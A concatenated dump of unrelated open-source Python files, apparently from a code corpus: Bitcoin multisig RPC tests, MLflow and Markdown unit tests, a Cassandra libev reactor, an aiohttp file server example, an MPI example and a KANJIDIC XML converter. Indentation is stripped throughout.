if 'wmulti' not in node1.listwallets():
try:
node1.loadwallet('wmulti')
except JSONRPCException as e:
path = os.path.join(self.options.tmpdir, "node1", "regtest", "wallets", "wmulti")
if e.error['code'] == -18 and "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path) in e.error['message']:
node1.createwallet(wallet_name='wmulti', disable_private_keys=True)
else:
raise
wmulti = node1.get_wallet_rpc('wmulti')
# Construct the expected descriptor
desc = 'multi({},{})'.format(self.nsigs, ','.join(self.pub))
if self.output_type == 'legacy':
desc = 'sh({})'.format(desc)
elif self.output_type == 'p2sh-segwit':
desc = 'sh(wsh({}))'.format(desc)
elif self.output_type == 'bech32':
desc = 'wsh({})'.format(desc)
desc = descsum_create(desc)
msig = node2.createmultisig(self.nsigs, self.pub, self.output_type)
madd = msig["address"]
mredeem = msig["redeemScript"]
assert_equal(desc, msig['descriptor'])
if self.output_type == 'bech32':
assert madd[0:4] == "bcrt" # actually a bech32 address
# compare against addmultisigaddress
msigw = wmulti.addmultisigaddress(self.nsigs, self.pub, None, self.output_type)
maddw = msigw["address"]
mredeemw = msigw["redeemScript"]
assert_equal(desc, drop_origins(msigw['descriptor']))
# addmultisigiaddress and createmultisig work the same
assert maddw == madd
assert mredeemw == mredeem
txid = node0.sendtoaddress(madd, 40)
tx = node0.getrawtransaction(txid, True)
vout = [v["n"] for v in tx["vout"] if madd == v["scriptPubKey"]["address"]]
assert len(vout) == 1
vout = vout[0]
scriptPubKey = tx["vout"][vout]["scriptPubKey"]["hex"]
value = tx["vout"][vout]["value"]
prevtxs = [{"txid": txid, "vout": vout, "scriptPubKey": scriptPubKey, "redeemScript": mredeem, "amount": value}]
node0.generate(1)
outval = value - decimal.Decimal("0.00001000")
rawtx = node2.createrawtransaction([{"txid": txid, "vout": vout}], [{self.final: outval}])
prevtx_err = dict(prevtxs[0])
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "Missing redeemScript/witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# if witnessScript specified, all ok
prevtx_err["witnessScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# both specified, also ok
prevtx_err["redeemScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript mismatch to witnessScript
prevtx_err["redeemScript"] = "6a" # OP_RETURN
assert_raises_rpc_error(-8, "redeemScript does not correspond to witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript does not match scriptPubKey
del prevtx_err["witnessScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# witnessScript does not match scriptPubKey
prevtx_err["witnessScript"] = prevtx_err["redeemScript"]
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
rawtx2 = node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs - 1], prevtxs)
rawtx3 = node2.signrawtransactionwithkey(rawtx2["hex"], [self.priv[-1]], prevtxs)
self.moved += outval
tx = node0.sendrawtransaction(rawtx3["hex"], 0)
blk = node0.generate(1)[0]
assert tx in node0.getblock(blk)["tx"]
txinfo = node0.getrawtransaction(tx, True, blk)
self.log.info("n/m=%d/%d %s size=%d vsize=%d weight=%d" % (self.nsigs, self.nkeys, self.output_type, txinfo["size"], txinfo["vsize"], txinfo["weight"]))
wmulti.unloadwallet()
if __name__ == '__main__':
RpcCreateMultiSigTest().main()
|
the-stack_0_3771 | import pytest
from unittest import mock
import mlflow
from mlflow.exceptions import MlflowException
import mlflow.spark
from mlflow._spark_autologging import _get_current_listener, PythonSubscriber
from tests.spark.autologging.utils import _get_or_create_spark_session
@pytest.fixture()
def spark_session():
session = _get_or_create_spark_session()
yield session
session.stop()
@pytest.fixture()
def mock_get_current_listener():
with mock.patch("mlflow._spark_autologging._get_current_listener") as get_listener_patch:
get_listener_patch.return_value = None
yield get_listener_patch
@pytest.mark.usefixtures("spark_session")
def test_autolog_call_idempotent():
mlflow.spark.autolog()
listener = _get_current_listener()
mlflow.spark.autolog()
assert _get_current_listener() == listener
def test_subscriber_methods():
# Test that PythonSubscriber satisfies the contract expected by the underlying Scala trait
# it implements (MlflowAutologEventSubscriber)
subscriber = PythonSubscriber()
subscriber.ping()
# Assert repl ID is stable & different between subscribers
assert subscriber.replId() == subscriber.replId()
assert PythonSubscriber().replId() != subscriber.replId()
def test_enabling_autologging_throws_for_wrong_spark_version(
spark_session, mock_get_current_listener
):
# pylint: disable=unused-argument
with mock.patch("mlflow._spark_autologging._get_spark_major_version") as get_version_mock:
get_version_mock.return_value = 2
with pytest.raises(
MlflowException, match="Spark autologging unsupported for Spark versions < 3"
):
mlflow.spark.autolog()
|
the-stack_0_3772 | from random import choice
import numpy as np
from tensorflow.python.keras.utils.data_utils import Sequence
from debvader.normalize import Normalizer
class COSMOSsequence(Sequence):
def __init__(
self,
list_of_samples,
x_col_name,
y_col_name,
batch_size,
num_iterations_per_epoch,
normalizer=None,
):
"""
initializes the Data generator
parameters:
list_of_samples: list of paths to the datafiles.
x_col_name: column name of data to be fed as input to the network
y_col_name: column name of data to be fed as target to the network
batch_size: sample sixe for each batch
num_iterations_per_epoch: number of samples (of size = batch_size) to be drawn from the sample
normalizer: object of debvader.normalize.Normalize, used to perform norm and denorm operations (default is None).
channel_last: boolean to indicate if the the clast channel corresponds to differnet bands of the input data.
"""
self.list_of_samples = list_of_samples
self.x_col_name = x_col_name
self.y_col_name = y_col_name
self.batch_size = batch_size
self.num_iterations_per_epoch = num_iterations_per_epoch
if (normalizer is not None) and (not isinstance(normalizer, Normalizer)):
raise ValueError(
"The parameter `normalizer` should be an instance of debvader.normalize.Normalizer"
)
self.normalizer = normalizer
def __len__(self):
return self.num_iterations_per_epoch
def __getitem__(self, idx):
current_loop_file_name = choice(self.list_of_samples)
current_sample = np.load(current_loop_file_name, allow_pickle=True)
batch = np.random.choice(current_sample, size=self.batch_size, replace=False)
x = batch[self.x_col_name]
y = batch[self.y_col_name]
x = np.array(x.tolist())
y = np.array(y.tolist())
if self.normalizer is not None:
x = self.normalizer.forward(x)
y = self.normalizer.forward(y)
# flip : flipping the image array
# if not self.channel_last:
rand = np.random.randint(4)
if rand == 1:
x = np.flip(x, axis=-1)
y = np.flip(y, axis=-1)
elif rand == 2:
x = np.swapaxes(x, -1, -2)
y = np.swapaxes(y, -1, -2)
elif rand == 3:
x = np.swapaxes(np.flip(x, axis=-1), -1, -2)
y = np.swapaxes(np.flip(y, axis=-1), -1, -2)
# Change the shape of inputs and targets to feed the network
x = np.transpose(x, axes=(0, 2, 3, 1))
y = np.transpose(y, axes=(0, 2, 3, 1))
return x, y
|
the-stack_0_3773 | from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
data = [1,3,5,7]
comm.send(data, dest=1)
if rank == 1:
info = MPI.Status()
data = comm.recv(source=0, status=info)
print("Received %d bytes of data." % info.Get_count())
print("Received %d integers." % info.Get_elements(MPI.INT))
|
the-stack_0_3774 | #!/usr/bin/env python3
"""Simple server written using an event loop."""
import argparse
import logging
import os
import sys
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import asyncio
import aiohttp
import aiohttp.server
class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
@asyncio.coroutine
def handle_request(self, message, payload):
print('method = {!r}; path = {!r}; version = {!r}'.format(
message.method, message.path, message.version))
path = message.path
if (not (path.isprintable() and path.startswith('/')) or '/.' in path):
print('bad path', repr(path))
path = None
else:
path = '.' + path
if not os.path.exists(path):
print('no file', repr(path))
path = None
else:
isdir = os.path.isdir(path)
if not path:
raise aiohttp.HttpProcessingError(code=404)
for hdr, val in message.headers.items():
print(hdr, val)
if isdir and not path.endswith('/'):
path = path + '/'
raise aiohttp.HttpProcessingError(
code=302, headers=(('URI', path), ('Location', path)))
response = aiohttp.Response(
self.writer, 200, http_version=message.version)
response.add_header('Transfer-Encoding', 'chunked')
# content encoding
accept_encoding = message.headers.get('accept-encoding', '').lower()
if 'deflate' in accept_encoding:
response.add_header('Content-Encoding', 'deflate')
response.add_compression_filter('deflate')
elif 'gzip' in accept_encoding:
response.add_header('Content-Encoding', 'gzip')
response.add_compression_filter('gzip')
response.add_chunking_filter(1025)
if isdir:
response.add_header('Content-type', 'text/html')
response.send_headers()
response.write(b'<ul>\r\n')
for name in sorted(os.listdir(path)):
if name.isprintable() and not name.startswith('.'):
try:
bname = name.encode('ascii')
except UnicodeError:
pass
else:
if os.path.isdir(os.path.join(path, name)):
response.write(b'<li><a href="' + bname +
b'/">' + bname + b'/</a></li>\r\n')
else:
response.write(b'<li><a href="' + bname +
b'">' + bname + b'</a></li>\r\n')
response.write(b'</ul>')
else:
response.add_header('Content-type', 'text/plain')
response.send_headers()
try:
with open(path, 'rb') as fp:
chunk = fp.read(8192)
while chunk:
response.write(chunk)
chunk = fp.read(8192)
except OSError:
response.write(b'Cannot open')
yield from response.write_eof()
if response.keep_alive():
self.keep_alive(True)
ARGS = argparse.ArgumentParser(description="Run simple HTTP server.")
ARGS.add_argument(
'--host', action="store", dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action="store", dest='port',
default=8080, type=int, help='Port number')
# make iocp and ssl mutually exclusive because ProactorEventLoop is
# incompatible with SSL
group = ARGS.add_mutually_exclusive_group()
group.add_argument(
'--iocp', action="store_true", dest='iocp', help='Windows IOCP event loop')
group.add_argument(
'--ssl', action="store_true", dest='ssl', help='Run ssl mode.')
ARGS.add_argument(
'--sslcert', action="store", dest='certfile', help='SSL cert file.')
ARGS.add_argument(
'--sslkey', action="store", dest='keyfile', help='SSL key file.')
def main():
args = ARGS.parse_args()
if ':' in args.host:
args.host, port = args.host.split(':', 1)
args.port = int(port)
if args.iocp:
from asyncio import windows_events
sys.argv.remove('--iocp')
logging.info('using iocp')
el = windows_events.ProactorEventLoop()
asyncio.set_event_loop(el)
if args.ssl:
here = os.path.join(os.path.dirname(__file__), 'tests')
if args.certfile:
certfile = args.certfile or os.path.join(here, 'sample.crt')
keyfile = args.keyfile or os.path.join(here, 'sample.key')
else:
certfile = os.path.join(here, 'sample.crt')
keyfile = os.path.join(here, 'sample.key')
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.load_cert_chain(certfile, keyfile)
else:
sslcontext = None
loop = asyncio.get_event_loop()
f = loop.create_server(
lambda: HttpRequestHandler(debug=True, keep_alive=75),
args.host, args.port,
ssl=sslcontext)
svr = loop.run_until_complete(f)
socks = svr.sockets
print('serving on', socks[0].getsockname())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
the-stack_0_3775 | import unittest
import threading
import queue
import time
import sys
sys.path.append("./functions")
import windows
class Streamer:
def __init__(self):
self.buffer = queue.Queue(maxsize=2)
def post(self, item):
if self.buffer.full():
#print("waiting")
self.buffer.join()
#print("post item")
self.buffer.put(item)
time.sleep(0.1)
def stream(self):
while True:
try:
yield self.buffer.get(timeout=1)
self.buffer.task_done()
except queue.Empty:
return
class MyTestCase(unittest.TestCase):
def test_streaming(self):
streamer = Streamer()
def post(count):
for i in range(count):
streamer.post("%d"%i)
thread = threading.Thread(target=post,args=[9])
thread.start()
for w in windows.discrete_window_text(streamer.stream()):
print(w)
thread.join()
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3776 | # Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import ssl
from threading import Lock, Thread
import time
from six.moves import range
from cassandra.connection import (Connection, ConnectionShutdown,
NONBLOCKING, Timer, TimerManager)
try:
import cassandra.io.libevwrapper as libev
except ImportError:
raise ImportError(
"The C extension needed to use libev was not found. This "
"probably means that you didn't have the required build dependencies "
"when installing the driver. See "
"http://datastax.github.io/python-driver/installation.html#c-extensions "
"for instructions on installing build dependencies and building "
"the C extension.")
log = logging.getLogger(__name__)
def _cleanup(loop):
if loop:
loop._cleanup()
class LibevLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop = libev.Loop()
self._notifier = libev.Async(self._loop)
self._notifier.start()
# prevent _notifier from keeping the loop from returning
self._loop.unref()
self._started = False
self._shutdown = False
self._lock = Lock()
self._lock_thread = Lock()
self._thread = None
# set of all connections; only replaced with a new copy
# while holding _conn_set_lock, never modified in place
self._live_conns = set()
# newly created connections that need their write/read watcher started
self._new_conns = set()
# recently closed connections that need their write/read watcher stopped
self._closed_conns = set()
self._conn_set_lock = Lock()
self._preparer = libev.Prepare(self._loop, self._loop_will_run)
# prevent _preparer from keeping the loop from returning
self._loop.unref()
self._preparer.start()
self._timers = TimerManager()
self._loop_timer = libev.Timer(self._loop, self._on_loop_timer)
def maybe_start(self):
should_start = False
with self._lock:
if not self._started:
log.debug("Starting libev event loop")
self._started = True
should_start = True
if should_start:
with self._lock_thread:
if not self._shutdown:
self._thread = Thread(target=self._run_loop, name="event_loop")
self._thread.daemon = True
self._thread.start()
self._notifier.send()
def _run_loop(self):
while True:
self._loop.start()
# there are still active watchers, no deadlock
with self._lock:
if not self._shutdown and self._live_conns:
log.debug("Restarting event loop")
continue
else:
# all Connections have been closed, no active watchers
log.debug("All Connections currently closed, event loop ended")
self._started = False
break
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
for conn in self._live_conns | self._new_conns | self._closed_conns:
conn.close()
for watcher in (conn._write_watcher, conn._read_watcher):
if watcher:
watcher.stop()
self.notify() # wake the timer watcher
# PYTHON-752 Thread might have just been created and not started
with self._lock_thread:
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def add_timer(self, timer):
self._timers.add_timer(timer)
self._notifier.send() # wake up in case this timer is earlier
def _update_timer(self):
if not self._shutdown:
next_end = self._timers.service_timeouts()
if next_end:
self._loop_timer.start(next_end - time.time()) # timer handles negative values
else:
self._loop_timer.stop()
def _on_loop_timer(self):
self._timers.service_timeouts()
def notify(self):
self._notifier.send()
def connection_created(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.add(conn)
self._live_conns = new_live_conns
new_new_conns = self._new_conns.copy()
new_new_conns.add(conn)
self._new_conns = new_new_conns
def connection_destroyed(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.discard(conn)
self._live_conns = new_live_conns
new_closed_conns = self._closed_conns.copy()
new_closed_conns.add(conn)
self._closed_conns = new_closed_conns
self._notifier.send()
def _loop_will_run(self, prepare):
changed = False
for conn in self._live_conns:
if not conn.deque and conn._write_watcher_is_active:
if conn._write_watcher:
conn._write_watcher.stop()
conn._write_watcher_is_active = False
changed = True
elif conn.deque and not conn._write_watcher_is_active:
conn._write_watcher.start()
conn._write_watcher_is_active = True
changed = True
if self._new_conns:
with self._conn_set_lock:
to_start = self._new_conns
self._new_conns = set()
for conn in to_start:
conn._read_watcher.start()
changed = True
if self._closed_conns:
with self._conn_set_lock:
to_stop = self._closed_conns
self._closed_conns = set()
for conn in to_stop:
if conn._write_watcher:
conn._write_watcher.stop()
# clear reference cycles from IO callback
del conn._write_watcher
if conn._read_watcher:
conn._read_watcher.stop()
# clear reference cycles from IO callback
del conn._read_watcher
changed = True
# TODO: update to do connection management, timer updates through dedicated async 'notifier' callbacks
self._update_timer()
if changed:
self._notifier.send()
_global_loop = None
atexit.register(partial(_cleanup, _global_loop))
class LibevConnection(Connection):
"""
An implementation of :class:`.Connection` that uses libev for its event loop.
"""
_write_watcher_is_active = False
_read_watcher = None
_write_watcher = None
_socket = None
@classmethod
def initialize_reactor(cls):
global _global_loop
if not _global_loop:
_global_loop = LibevLoop()
else:
if _global_loop._pid != os.getpid():
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
_global_loop = LibevLoop()
@classmethod
def handle_fork(cls):
global _global_loop
if _global_loop:
_global_loop._cleanup()
_global_loop = None
@classmethod
def create_timer(cls, timeout, callback):
timer = Timer(timeout, callback)
_global_loop.add_timer(timer)
return timer
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
self.deque = deque()
self._deque_lock = Lock()
self._connect_socket()
self._socket.setblocking(0)
with _global_loop._lock:
self._read_watcher = libev.IO(self._socket.fileno(), libev.EV_READ, _global_loop._loop, self.handle_read)
self._write_watcher = libev.IO(self._socket.fileno(), libev.EV_WRITE, _global_loop._loop, self.handle_write)
self._send_options_message()
_global_loop.connection_created(self)
# start the global event loop if needed
_global_loop.maybe_start()
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.endpoint)
_global_loop.connection_destroyed(self)
self._socket.close()
log.debug("Closed socket to %s", self.endpoint)
# don't leave in-progress operations hanging
if not self.is_defunct:
self.error_all_requests(
ConnectionShutdown("Connection to %s was closed" % self.endpoint))
def handle_write(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
while True:
try:
with self._deque_lock:
next_msg = self.deque.popleft()
except IndexError:
return
try:
sent = self._socket.send(next_msg)
except socket.error as err:
if (err.args[0] in NONBLOCKING or
err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE)):
with self._deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self._deque_lock:
self.deque.appendleft(next_msg[sent:])
def handle_read(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
try:
while True:
buf = self._socket.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
return
else:
self.defunct(err)
return
elif err.args[0] in NONBLOCKING:
return
else:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
else:
log.debug("Connection %s closed by server", self)
self.close()
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self._deque_lock:
self.deque.extend(chunks)
_global_loop.notify()
|
the-stack_0_3778 | from xml.etree import ElementTree as ET
import re
import copy
import json
from tqdm import tqdm
FILE = 'kanjidic2.xml'
TEMPLATE = {
"kanji": "",
"strokes": 0,
"freq": None,
"jlpt": None,
"grade": 0,
"reading": {
"kun": [],
"on": []
},
"meaning": [],
"name_reading": []
}
def parse_misc(elements, new):
for ele in elements:
if ele.tag.lower() == "grade":
new['grade'] = ele.text
elif ele.tag.lower() == 'stroke_count':
new['strokes'] = ele.text
elif ele.tag.lower() == 'freq':
new['freq'] = ele.text
elif ele.tag.lower() == "jlpt":
new['jlpt'] = ele.text
def parse_literal(elements, new):
new['kanji'] = elements.text
def parse_rmgroup(elements, new):
for ele in elements:
if ele.tag.lower() == "reading":
if ele.attrib:
if ele.attrib['r_type'] == "ja_on":
new['reading']['on'].append(ele.text)
elif ele.attrib['r_type'] == "ja_kun":
new['reading']['kun'].append(ele.text)
elif ele.tag.lower() == "meaning":
if ele.attrib:
if ele.attrib['m_lang'] == "en":
new["meaning"].append(ele.text)
else:
new['meaning'].append(ele.text)
def parse_readings(elements, new):
for ele in elements:
if ele.tag.lower() == "rmgroup":
parse_rmgroup(ele, new)
elif ele.tag.lower() == "nanori":
new['name_reading'].append(ele.text)
def xml_parser():
i = 0
f = ET.iterparse(FILE)
DATA = []
for event, elements in tqdm(f):
if event == 'end' and elements.tag == 'character':
new_ele = copy.deepcopy(TEMPLATE)
for ele in elements.iter():
if ele.tag.lower() == "literal":
parse_literal(ele, new_ele)
elif ele.tag.lower() == "reading_meaning":
parse_readings(ele, new_ele)
elif ele.tag.lower() == "misc":
parse_misc(ele, new_ele)
DATA.append(new_ele)
return {"words": DATA}
def xml_to_json():
""" Convert xml to json and save to file """
file = open("Kanjidic.json", "w", encoding="utf8")
print("Beginning conversion of Kanjidic")
json.dump(xml_parser(), file, indent=2, ensure_ascii=False)
print("Conversion finished")
print("Saving to file...")
file.close()
if __name__ == "__main__":
xml_to_json() |
the-stack_0_3779 | """
Python Markdown
A Python implementation of John Gruber's Markdown.
Documentation: https://python-markdown.github.io/
GitHub: https://github.com/Python-Markdown/markdown/
PyPI: https://pypi.org/project/Markdown/
Started by Manfred Stienstra (http://www.dwerg.net/).
Maintained for a few years by Yuri Takhteyev (http://www.freewisdom.org).
Currently maintained by Waylan Limberg (https://github.com/waylan),
Dmitry Shachnev (https://github.com/mitya57) and Isaac Muse (https://github.com/facelessuser).
Copyright 2007-2018 The Python Markdown Project (v. 1.7 and later)
Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
Copyright 2004 Manfred Stienstra (the original version)
License: BSD (see LICENSE.md for details).
Python-Markdown Regression Tests
================================
Tests of the various APIs with the python markdown lib.
"""
import unittest
import sys
import os
import markdown
import warnings
from markdown.__main__ import parse_options
from logging import DEBUG, WARNING, CRITICAL
import yaml
import tempfile
from io import BytesIO
import xml.etree.ElementTree as etree
from xml.etree.ElementTree import ProcessingInstruction
class TestMarkdownBasics(unittest.TestCase):
""" Tests basics of the Markdown class. """
def setUp(self):
""" Create instance of Markdown. """
self.md = markdown.Markdown()
def testBlankInput(self):
""" Test blank input. """
self.assertEqual(self.md.convert(''), '')
def testWhitespaceOnly(self):
""" Test input of only whitespace. """
self.assertEqual(self.md.convert(' '), '')
def testSimpleInput(self):
""" Test simple input. """
self.assertEqual(self.md.convert('foo'), '<p>foo</p>')
def testInstanceExtension(self):
""" Test Extension loading with a class instance. """
from markdown.extensions.footnotes import FootnoteExtension
markdown.Markdown(extensions=[FootnoteExtension()])
def testEntryPointExtension(self):
""" Test Extension loading with an entry point. """
markdown.Markdown(extensions=['footnotes'])
def testDotNotationExtension(self):
""" Test Extension loading with Name (`path.to.module`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes'])
def testDotNotationExtensionWithClass(self):
""" Test Extension loading with class name (`path.to.module:Class`). """
markdown.Markdown(extensions=['markdown.extensions.footnotes:FootnoteExtension'])
class TestConvertFile(unittest.TestCase):
""" Tests of ConvertFile. """
def setUp(self):
self.saved = sys.stdin, sys.stdout
sys.stdin = BytesIO(bytes('foo', encoding='utf-8'))
sys.stdout = BytesIO()
def tearDown(self):
sys.stdin, sys.stdout = self.saved
def getTempFiles(self, src):
""" Return the file names for two temp files. """
infd, infile = tempfile.mkstemp(suffix='.txt')
with os.fdopen(infd, 'w') as fp:
fp.write(src)
outfd, outfile = tempfile.mkstemp(suffix='.html')
return infile, outfile, outfd
def testFileNames(self):
infile, outfile, outfd = self.getTempFiles('foo')
markdown.markdownFromFile(input=infile, output=outfile)
with os.fdopen(outfd, 'r') as fp:
output = fp.read()
self.assertEqual(output, '<p>foo</p>')
def testFileObjects(self):
infile = BytesIO(bytes('foo', encoding='utf-8'))
outfile = BytesIO()
markdown.markdownFromFile(input=infile, output=outfile)
outfile.seek(0)
self.assertEqual(outfile.read().decode('utf-8'), '<p>foo</p>')
def testStdinStdout(self):
markdown.markdownFromFile()
sys.stdout.seek(0)
self.assertEqual(sys.stdout.read().decode('utf-8'), '<p>foo</p>')
class TestBlockParser(unittest.TestCase):
""" Tests of the BlockParser class. """
def setUp(self):
""" Create instance of BlockParser. """
self.parser = markdown.Markdown().parser
def testParseChunk(self):
""" Test BlockParser.parseChunk. """
root = etree.Element("div")
text = 'foo'
self.parser.parseChunk(root, text)
self.assertEqual(
markdown.serializers.to_xhtml_string(root),
"<div><p>foo</p></div>"
)
def testParseDocument(self):
""" Test BlockParser.parseDocument. """
lines = ['#foo', '', 'bar', '', ' baz']
tree = self.parser.parseDocument(lines)
self.assertIsInstance(tree, etree.ElementTree)
self.assertIs(etree.iselement(tree.getroot()), True)
self.assertEqual(
markdown.serializers.to_xhtml_string(tree.getroot()),
"<div><h1>foo</h1><p>bar</p><pre><code>baz\n</code></pre></div>"
)
class TestBlockParserState(unittest.TestCase):
""" Tests of the State class for BlockParser. """
def setUp(self):
self.state = markdown.blockparser.State()
def testBlankState(self):
""" Test State when empty. """
self.assertEqual(self.state, [])
def testSetSate(self):
""" Test State.set(). """
self.state.set('a_state')
self.assertEqual(self.state, ['a_state'])
self.state.set('state2')
self.assertEqual(self.state, ['a_state', 'state2'])
def testIsSate(self):
""" Test State.isstate(). """
self.assertEqual(self.state.isstate('anything'), False)
self.state.set('a_state')
self.assertEqual(self.state.isstate('a_state'), True)
self.state.set('state2')
self.assertEqual(self.state.isstate('state2'), True)
self.assertEqual(self.state.isstate('a_state'), False)
self.assertEqual(self.state.isstate('missing'), False)
def testReset(self):
""" Test State.reset(). """
self.state.set('a_state')
self.state.reset()
self.assertEqual(self.state, [])
self.state.set('state1')
self.state.set('state2')
self.state.reset()
self.assertEqual(self.state, ['state1'])
class TestHtmlStash(unittest.TestCase):
""" Test Markdown's HtmlStash. """
def setUp(self):
self.stash = markdown.util.HtmlStash()
self.placeholder = self.stash.store('foo')
def testSimpleStore(self):
""" Test HtmlStash.store. """
self.assertEqual(self.placeholder, self.stash.get_placeholder(0))
self.assertEqual(self.stash.html_counter, 1)
self.assertEqual(self.stash.rawHtmlBlocks, ['foo'])
def testStoreMore(self):
""" Test HtmlStash.store with additional blocks. """
placeholder = self.stash.store('bar')
self.assertEqual(placeholder, self.stash.get_placeholder(1))
self.assertEqual(self.stash.html_counter, 2)
self.assertEqual(
self.stash.rawHtmlBlocks,
['foo', 'bar']
)
def testReset(self):
""" Test HtmlStash.reset. """
self.stash.reset()
self.assertEqual(self.stash.html_counter, 0)
self.assertEqual(self.stash.rawHtmlBlocks, [])
class Item:
""" A dummy Registry item object for testing. """
def __init__(self, data):
self.data = data
def __repr__(self):
return repr(self.data)
def __eq__(self, other):
return self.data == other
class RegistryTests(unittest.TestCase):
""" Test the processor registry. """
def testCreateRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
self.assertEqual(len(r), 1)
self.assertIsInstance(r, markdown.util.Registry)
def testRegisterWithoutPriority(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r.register(Item('a'))
def testSortRegistry(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 21)
r.register(Item('c'), 'c', 20.5)
self.assertEqual(len(r), 3)
self.assertEqual(list(r), ['b', 'c', 'a'])
def testIsSorted(self):
r = markdown.util.Registry()
self.assertIs(r._is_sorted, False)
r.register(Item('a'), 'a', 20)
list(r)
self.assertIs(r._is_sorted, True)
r.register(Item('b'), 'b', 21)
self.assertIs(r._is_sorted, False)
r['a']
self.assertIs(r._is_sorted, True)
r._is_sorted = False
r.get_index_for_name('a')
self.assertIs(r._is_sorted, True)
r._is_sorted = False
repr(r)
self.assertIs(r._is_sorted, True)
def testDeregister(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
self.assertEqual(len(r), 3)
r.deregister('b')
self.assertEqual(len(r), 2)
r.deregister('c', strict=False)
self.assertEqual(len(r), 1)
# deregister non-existent item with strict=False
r.deregister('d', strict=False)
self.assertEqual(len(r), 1)
with self.assertRaises(ValueError):
# deregister non-existent item with strict=True
r.deregister('e')
self.assertEqual(list(r), ['a'])
def testRegistryContains(self):
r = markdown.util.Registry()
item = Item('a')
r.register(item, 'a', 20)
self.assertIs('a' in r, True)
self.assertIn(item, r)
self.assertNotIn('b', r)
def testRegistryIter(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(list(r), ['b', 'a'])
def testRegistryGetItemByIndex(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r[0], 'b')
self.assertEqual(r[1], 'a')
with self.assertRaises(IndexError):
r[3]
def testRegistryGetItemByItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r['a'], 'a')
self.assertEqual(r['b'], 'b')
with self.assertRaises(KeyError):
r['c']
def testRegistrySetItem(self):
r = markdown.util.Registry()
with self.assertRaises(TypeError):
r[0] = 'a'
with self.assertRaises(TypeError):
r['a'] = 'a'
def testRegistryDelItem(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
with self.assertRaises(TypeError):
del r[0]
with self.assertRaises(TypeError):
del r['a']
def testRegistrySlice(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
slc = r[1:]
self.assertEqual(len(slc), 2)
self.assertIsInstance(slc, markdown.util.Registry)
